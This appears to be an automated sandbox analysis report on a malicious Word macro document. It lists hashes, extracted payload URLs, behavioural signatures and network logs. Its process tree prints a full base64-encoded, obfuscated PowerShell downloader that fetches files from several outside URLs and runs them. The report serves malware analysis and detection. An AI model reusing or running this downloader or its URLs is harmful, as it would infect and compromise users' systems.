Analysis
-
max time kernel
136s -
max time network
125s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
25/05/2024, 09:03 UTC
Behavioral task
behavioral1
Sample
71798c1415bd2c656552ec32c9835538_JaffaCakes118.doc
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
71798c1415bd2c656552ec32c9835538_JaffaCakes118.doc
Resource
win10v2004-20240426-en
General
-
Target
71798c1415bd2c656552ec32c9835538_JaffaCakes118.doc
-
Size
187KB
-
MD5
71798c1415bd2c656552ec32c9835538
-
SHA1
51702d9597e77b881c90467455c6479d6a8b7774
-
SHA256
0ed1adf222903a5b3335427d554d4a74c05a27cfd1a438788c04f3b3d720c002
-
SHA512
fcaaeaa1556acb2d5181f9ea0706b0d65240f3d118ca5c81cdb22361b908571aae7b9e9164ef730feaa9c97729c5e692973639e2bc9273a410f5d3329b4cd64f
-
SSDEEP
1536:RGGGGGGGGGG2xJLEt+LaaGGGGGGGGGGjLo9xilATmd8YkYeT/EA8sap8cjufajnG:vrfrzOH98ipgEh5JYR
Malware Config
Extracted
http://dtyl.shop/wp-content/W68Nx/
https://star-speed.vip/wp-admin/U2jRIg/
https://cshub123.cn/wp-admin/Gajs/
https://viettellogistics.com.vn/wp-content/oS4/
http://cococat.se/wp-admin/2Oaf/
http://andresirjan.ir/wp-admin/JSH/
https://sptrade.com.br/wp-includes/iFZOvL/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3988 1748 powershell.exe 82 -
Blocklisted process makes network request 6 IoCs
flow pid Process 28 3988 powershell.exe 102 3988 powershell.exe 105 3988 powershell.exe 106 3988 powershell.exe 109 3988 powershell.exe 121 3988 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 3260 WINWORD.EXE 3260 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3988 powershell.exe 3988 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3988 powershell.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
pid Process 3260 WINWORD.EXE 3260 WINWORD.EXE 3260 WINWORD.EXE 3260 WINWORD.EXE 3260 WINWORD.EXE 3260 WINWORD.EXE 3260 WINWORD.EXE 3260 WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\71798c1415bd2c656552ec32c9835538_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3260
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -encod JABDADIAdgBhAGkAagA1AD0AKAAoACcAUAAnACsAJwBjAHUAJwApACsAJwB1ACcAKwAoACcAdAAnACsAJwByAHUAJwApACkAOwAuACgAJwBuAGUAdwAtACcAKwAnAGkAdAAnACsAJwBlAG0AJwApACAAJABlAG4AdgA6AFUAcwBFAFIAcABSAG8ARgBJAEwARQBcAEgAWQAzAHkAdAAzAGkAXABTADgASwA0ADkAdQBtAFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAGQAaQBSAGUAYwB0AE8AUgB5ADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBDAFUAYABSAEkAdABgAFkAUAByAG8AYABUAG8AYwBvAEwAIgAgAD0AIAAoACgAJwB0ACcAKwAnAGwAcwAnACkAKwAoACcAMQAyACwAIAB0ACcAKwAnAGwAcwAnACkAKwAoACcAMQAnACsAJwAxACwAJwApACsAKAAnACAAdAAnACsAJwBsACcAKQArACcAcwAnACkAOwAkAFMAawB5AHEANwBoAG0AIAA9ACAAKAAnAFgAMgAnACsAKAAnADgAJwArACcAegAwADMAJwApACsAJwAxAGQAJwApADsAJABZAHQAaAB4AGIAcgBmAD0AKAAoACcATwAnACsAJwBuAGUAJwApACsAKAAnAHcAJwArACcAbQA5ACcAKQArACcAYgAnACkAOwAkAFcAZABhAGkAZAA4ADYAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACgAJwB3ACcAKwAnAHYATwAnACkAKwAoACcASAB5ADMAJwArACcAeQB0ACcAKQArACgAJwAzAGkAJwArACcAdwB2ACcAKQArACgAJwBPACcAKwAnAFMAOAAnACkAKwAoACcAawA0ACcAKwAnADkAJwApACsAKAAnAHUAbQAnACsAJwB3ACcAKQArACcAdgBPACcAKQAuACIAUgBlAHAATABhAGAAQwBlACIAKAAoACcAdwAnACsAJwB2AE8AJwApACwAWwBzAHQAcgBJAG4AZwBdAFsAYwBoAGEAUgBdADkAMgApACkAKwAkAFMAawB5AHEANwBoAG0AKwAoACgAJwAuAGUAJwArACcAeAAnACkAKwAnAGUAJwApADsAJABOAGIAcQBpAHkAdABpAD0AKAAnAFQAJwArACgAJwA4ACcAKwAnAGgAeQB4AGcAJwApACsAJwBtACcAKQA7ACQAVwB0ADAAcgBlAGkAcwA9ACYAKAAnAG4AZQB3AC0AJwArACcAbwAnACsAJwBiAGoAJwArACcAZQBjAHQAJwApACAAbgBlAFQALgB3AEUAYgBjAEwAaQBlAE4AdAA7ACQARQBxAHEAagA1AGgAOQA9ACgAKAAnAGgAdAAnACsAJwB0ACcAKQArACcAcAA6ACcAKwAoACcALwAvAGQAJwArACcAdAB5ACcAKQArACgAJwBsAC4AcwBoAG8AcAAvAHcAJwArACcAcAAtACcAKwAnAGMAbwBuAHQAZQBuACcAKwAnAHQALwBXADYAOAAnACkAKwAoACcATgB4ACcAKwAnAC8AKgBoAHQAdAAnACkAKwAnAHAAJwArACcAcwAnACsAKAAnADoALwAvAHMAJwArACcAdABhAHIAJwArACcALQAnACkAKwAnAHMAJwArACgAJwBwACcAKwAnAGUAZQBkAC4AJwArACcAdgBpACcAKQArACcAcAAnACsAJwAvACcAKwAoACcAdwBwACcAKwAnAC0AJwApACsAKAAnAGEAJwArACcAZAAnACsAJwBtAGkAbgAvAFUAJwArACcAMgAnACsAJwBqAFIASQBnAC8AJwApACsAKAAnACoAaAAnACsAJwB0ACcAKQArACcAdABwACcAKwAoACcAcwA6ACcAKwAnAC8ALwAnACkAKwAnAGMAJwArACgAJwBzAGgAdQAnACsAJwBiADEAJwApACsAKAAnADIAMwAnACsAJwAuAGMAbgAvACcAKwAnAHcAcAAtACcAKQArACcAYQAnACsAKAAnAGQAbQBpAG4ALwBHACcAKwAnAGEAJwArACcAagBzACcAKQArACcALwAqACcAKwAoACcAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKwAoACcAcwA6AC8AJwArACcALwAnACkAKwAoACcAdgBpAGUAdAB0AGUAbABsACcAKwAnAG8AJwArACcAZwBpAHMAdABpACcAKQArACcAYwBzACcAKwAoACcALgBjACcAKwAnAG8AJwArACcAbQAuAHYAJwApACsAJwBuAC8AJwArACcAdwAnACsAKAAnAHAAJwArACcALQAnACsAJwBjAG8AbgB0AGUAbgB0ACcAKQArACgAJwAvAG8AUwA0ACcAKwAnAC8AJwApACsAKAAnACoAaAB0AHQAcAA6AC8ALwBjAG8AJwArACcAYwAnACsAJwBvACcAKQArACgAJwBjAGEAJwArACcAdAAuAHMAZQAvACcAKQArACgAJwB3ACcAKwAnAHAALQAnACkAKwAoACcAYQAnACsAJwBkAG0AJwApACsAKAAnAGkAbgAvADIAJwArACcATwAnACkAKwAnAGEAJwArACgAJwBmACcAKwAnAC8AKgAnACkAKwAnAGgAdAAnACsAKAAnAHQAcAA6AC8ALwAnACsAJwBhACcAKQArACgAJwBuAGQAJwArACcAcgAnACkAKwAoACcAZQAnACsAJwBzAGkAJwApACsAKAAnAHIAagBhAG4ALgAnACsAJwBpACcAKQArACgAJwByAC8AdwAnACsAJwBwACcAKQArACcALQAnACsAKAAnAGEAZABtAGkAbgAnACsAJwAvACcAKwAnAEoAUwBIACcAKwAnAC8AKgAnACsAJwBoAHQAJwApACsAJwB0ACcAKwAoACcAcABzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBzAHAAdAByAGEAZAAnACsAJwBlACcAKQArACgAJwAuAGMAbwAnACsAJwBtACcAKQArACcALgBiACcAKwAoACcAcgAvAHcAcAAnACsAJwAtACcAKQArACcAaQAnACsAJwBuACcAKwAnAGMAJwArACgAJwBsAHUAZABlAHMALwAnACsAJwBpAEYAJwArACcAWgBPAHYATAAnACkAKwAnAC8AJwApAC4AIgBzAFAAYABsAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAE0AZQBrADEAeAB3AHUAPQAoACgAJwBLAHcAJwArACcAXwBlACcAKQArACcAcAAnACsAJwA5AHUAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAVABpADgAaABuADEAcAAgAGkAbgAgACQARQBxAHEAagA1AGgAOQApAHsAdAByAHkAewAkAFcAdAAwAHIAZQBpAHMALgAiAGQAYABvAHcAYABOAGwATwBhAEQAZgBgAEkAbABFACIAKAAkAFQAaQA4AGgAbgAxAHAALAAgACQAVwBkAGEAaQBkADgANgApADsAJABXADYAcAAxAGoANwBoAD0AKAAoACcASAA1ACcAKwAnADgAZQAnACkAKwAoACcAagByACcAKwAnAGwAJwApACkAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQAVwBkAGEAaQBkADgANgApAC4AIgBMAGUATgBgAEcAdABoACIAIAAtAGcAZQAgADIANwAxADkANAApACAAewAmACgAJwBJACcAKwAnAG4AdgBvAGsAZQAtAEkAJwArACcAdABlAG0AJwApACgAJABXAGQAYQBpAGQAOAA2ACkAOwAkAEMAZQBoAHkAbABoADkAPQAoACcAVwA1ACcAKwAoACcAYwB1AGQAJwArACcAMAA0ACcAKQApADsAYgByAGUAYQBrADsAJABLADQAMwAzAHgANAB3AD0AKAAoACcAVwBxACcAKwAnADUAJwApACsAJwAxACcAKwAoACcAcAAnACsAJwBtADkAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEAZQBsADQAbQBlAHQAPQAoACgAJwBNACcAKwAnAGkAbwAnACkAKwAnAGMAJwArACgAJwBmACcAKwAnADcAaAAnACkAKQA=1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3988
Network
-
Remote address:8.8.8.8:53Request241.150.49.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestroaming.officeapps.live.comIN AResponseroaming.officeapps.live.comIN CNAMEprod.roaming1.live.com.akadns.netprod.roaming1.live.com.akadns.netIN CNAMEeur.roaming1.live.com.akadns.neteur.roaming1.live.com.akadns.netIN CNAMEneu-azsc-000.roaming.officeapps.live.comneu-azsc-000.roaming.officeapps.live.comIN CNAMEosiprod-neu-buff-azsc-000.northeurope.cloudapp.azure.comosiprod-neu-buff-azsc-000.northeurope.cloudapp.azure.comIN A52.109.76.243
-
Remote address:52.109.76.243:443RequestPOST /rs/RoamingSoapService.svc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: text/xml; charset=utf-8
User-Agent: MS-WebServices/1.0
SOAPAction: "http://tempuri.org/IRoamingSettingsService/GetConfig"
Content-Length: 511
Host: roaming.officeapps.live.com
ResponseHTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/10.0
X-OfficeFE: RoamingFE_IN_386
X-OfficeVersion: 16.0.17711.30575
X-OfficeCluster: neu-000.roaming.officeapps.live.com
X-CorrelationId: ebbc2c58-855e-4c22-951d-c6d7117c4adf
X-Powered-By: ASP.NET
Date: Sat, 25 May 2024 09:03:56 GMT
Content-Length: 654
-
Remote address:8.8.8.8:53Request240.143.123.92.in-addr.arpaIN PTRResponse240.143.123.92.in-addr.arpaIN PTRa92-123-143-240deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request240.76.109.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request243.76.109.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestdtyl.shopIN AResponse
-
Remote address:8.8.8.8:53Request73.31.126.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requeststar-speed.vipIN AResponse
-
Remote address:8.8.8.8:53Requestcshub123.cnIN AResponsecshub123.cnIN A216.152.233.103
-
Remote address:8.8.8.8:53Requestg.bing.comIN AResponseg.bing.comIN CNAMEg-bing-com.dual-a-0034.a-msedge.netg-bing-com.dual-a-0034.a-msedge.netIN CNAMEdual-a-0034.a-msedge.netdual-a-0034.a-msedge.netIN A204.79.197.237dual-a-0034.a-msedge.netIN A13.107.21.237
-
GEThttps://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8bxpffpy6Zp9jxlVY79MSwTVUCUwWnaO2_USypv0wR-U-ZOqDRUayShnatE7mK_F6xlLTkPIHy7bwspOIwhgonGAdzhh9wZrp-1AfZHLrdkZVo_oGzqWLYPvzpPY0XwIqpJJnbFX372cE-X5pDRUdBQsSBP9FQDM9BMFfHsG1l8y2LrU5%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3Dd895e4761d7014c66b98825dac2e0c60&TIME=20240426T135156Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:DA7A91E1-7E56-FC56-DF5D-E341A69C2E55&deviceId=6966564702298189&muid=DA7A91E17E56FC56DF5DE341A69C2E55Remote address:204.79.197.237:443RequestGET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8bxpffpy6Zp9jxlVY79MSwTVUCUwWnaO2_USypv0wR-U-ZOqDRUayShnatE7mK_F6xlLTkPIHy7bwspOIwhgonGAdzhh9wZrp-1AfZHLrdkZVo_oGzqWLYPvzpPY0XwIqpJJnbFX372cE-X5pDRUdBQsSBP9FQDM9BMFfHsG1l8y2LrU5%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3Dd895e4761d7014c66b98825dac2e0c60&TIME=20240426T135156Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:DA7A91E1-7E56-FC56-DF5D-E341A69C2E55&deviceId=6966564702298189&muid=DA7A91E17E56FC56DF5DE341A69C2E55 HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
ResponseHTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=04589EF10F676972005D8A7B0E8768B7; domain=.bing.com; expires=Thu, 19-Jun-2025 09:03:58 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 9FE6280A0B7B4D5F8209A4BE6B276662 Ref B: LON04EDGE1021 Ref C: 2024-05-25T09:03:58Z
date: Sat, 25 May 2024 09:03:58 GMT
-
GEThttps://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8bxpffpy6Zp9jxlVY79MSwTVUCUwWnaO2_USypv0wR-U-ZOqDRUayShnatE7mK_F6xlLTkPIHy7bwspOIwhgonGAdzhh9wZrp-1AfZHLrdkZVo_oGzqWLYPvzpPY0XwIqpJJnbFX372cE-X5pDRUdBQsSBP9FQDM9BMFfHsG1l8y2LrU5%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3Dd895e4761d7014c66b98825dac2e0c60&TIME=20240426T135156Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:DA7A91E1-7E56-FC56-DF5D-E341A69C2E55&deviceId=6966564702298189&muid=DA7A91E17E56FC56DF5DE341A69C2E55Remote address:204.79.197.237:443RequestGET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8bxpffpy6Zp9jxlVY79MSwTVUCUwWnaO2_USypv0wR-U-ZOqDRUayShnatE7mK_F6xlLTkPIHy7bwspOIwhgonGAdzhh9wZrp-1AfZHLrdkZVo_oGzqWLYPvzpPY0XwIqpJJnbFX372cE-X5pDRUdBQsSBP9FQDM9BMFfHsG1l8y2LrU5%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3Dd895e4761d7014c66b98825dac2e0c60&TIME=20240426T135156Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:DA7A91E1-7E56-FC56-DF5D-E341A69C2E55&deviceId=6966564702298189&muid=DA7A91E17E56FC56DF5DE341A69C2E55 HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=04589EF10F676972005D8A7B0E8768B7; _EDGE_S=SID=264D58218138605D3A2F4CAB80706195
ResponseHTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=uDS9cTTUKAGwPKlM7vyA-sxMR_CxASjgG6JIS-HjIPk; domain=.bing.com; expires=Thu, 19-Jun-2025 09:03:59 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: E4215425B6B947EBA10CA8627B131BEA Ref B: LON04EDGE1021 Ref C: 2024-05-25T09:03:59Z
date: Sat, 25 May 2024 09:03:58 GMT
-
GEThttps://www.bing.com/aes/c.gif?RG=6e7988d151f34ab5bb010a5e9231d576&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T135156Z&adUnitId=11730597&localId=w:DA7A91E1-7E56-FC56-DF5D-E341A69C2E55&deviceId=6966564702298189Remote address:23.62.61.194:443RequestGET /aes/c.gif?RG=6e7988d151f34ab5bb010a5e9231d576&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T135156Z&adUnitId=11730597&localId=w:DA7A91E1-7E56-FC56-DF5D-E341A69C2E55&deviceId=6966564702298189 HTTP/2.0
host: www.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=04589EF10F676972005D8A7B0E8768B7
ResponseHTTP/2.0 200
pragma: no-cache
vary: Origin
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 34CA4CB248D64E92A9CC695BE0A761DE Ref B: BRU30EDGE0913 Ref C: 2024-05-25T09:03:59Z
content-length: 0
date: Sat, 25 May 2024 09:03:59 GMT
set-cookie: _EDGE_S=SID=264D58218138605D3A2F4CAB80706195; path=/; httponly; domain=bing.com
set-cookie: MUIDB=04589EF10F676972005D8A7B0E8768B7; path=/; httponly; expires=Thu, 19-Jun-2025 09:03:59 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.be3d3e17.1716627839.1cc1226c
-
Remote address:8.8.8.8:53Request237.197.79.204.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request194.61.62.23.in-addr.arpaIN PTRResponse194.61.62.23.in-addr.arpaIN PTRa23-62-61-194deploystaticakamaitechnologiescom
-
GEThttps://www.bing.com/th?id=OADD2.10239356736264_1E1NQW5LZ8SVSGPEK&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90Remote address:23.62.61.194:443RequestGET /th?id=OADD2.10239356736264_1E1NQW5LZ8SVSGPEK&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90 HTTP/2.0
host: www.bing.com
accept: */*
cookie: MUID=04589EF10F676972005D8A7B0E8768B7; _EDGE_S=SID=264D58218138605D3A2F4CAB80706195; MSPTC=uDS9cTTUKAGwPKlM7vyA-sxMR_CxASjgG6JIS-HjIPk; MUIDB=04589EF10F676972005D8A7B0E8768B7
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
ResponseHTTP/2.0 200
content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 999
date: Sat, 25 May 2024 09:04:01 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.be3d3e17.1716627841.1cc1289f
-
Remote address:8.8.8.8:53Request43.58.199.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request94.65.42.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request183.142.211.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestmetadata.templates.cdn.office.netIN AResponsemetadata.templates.cdn.office.netIN CNAMEtemplatesmetadata.office.nettemplatesmetadata.office.netIN CNAMEtemplatesmetadata.office.net.edgekey.nettemplatesmetadata.office.net.edgekey.netIN CNAMEe26769.dscb.akamaiedge.nete26769.dscb.akamaiedge.netIN A23.62.61.162e26769.dscb.akamaiedge.netIN A23.62.61.184
-
GEThttps://metadata.templates.cdn.office.net/client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527>ype=0%2C1%2C2%2C5%2CWINWORD.EXERemote address:23.62.61.162:443RequestGET /client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527>ype=0%2C1%2C2%2C5%2C HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: metadata.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Server: Kestrel
Content-Encoding: gzip
Content-Length: 1264
Cache-Control: max-age=186735
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Vary: Accept-Encoding
-
Remote address:8.8.8.8:53Requestbinaries.templates.cdn.office.netIN AResponsebinaries.templates.cdn.office.netIN CNAMEbinaries.templates.cdn.office.net.edgesuite.netbinaries.templates.cdn.office.net.edgesuite.netIN CNAMEa1847.dscg2.akamai.neta1847.dscg2.akamai.netIN A2.17.251.23a1847.dscg2.akamai.netIN A2.17.251.32
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp01840907.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 2jOARYFw5gy+pyYC/dDZVQ==
Last-Modified: Fri, 22 Apr 2016 15:41:23 GMT
ETag: 0x8D36AC48EC98375
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d064db8e-b01e-0097-7097-a05ba0000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp0309043402.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: dIpTxr3Vzpe9VKdsejNChg==
Last-Modified: Wed, 29 Aug 2018 18:14:30 GMT
ETag: 0x8D60DDB43B59EC5
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3d093d5b-601e-0153-7197-a05713000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp02835233.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: xFXEvEvsng2mfE0eU+RtWg==
Last-Modified: Fri, 22 Apr 2016 16:09:25 GMT
ETag: 0x8D36AC879BBB45C
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 428c94d7-801e-0139-7097-a08f3b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp02851217.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
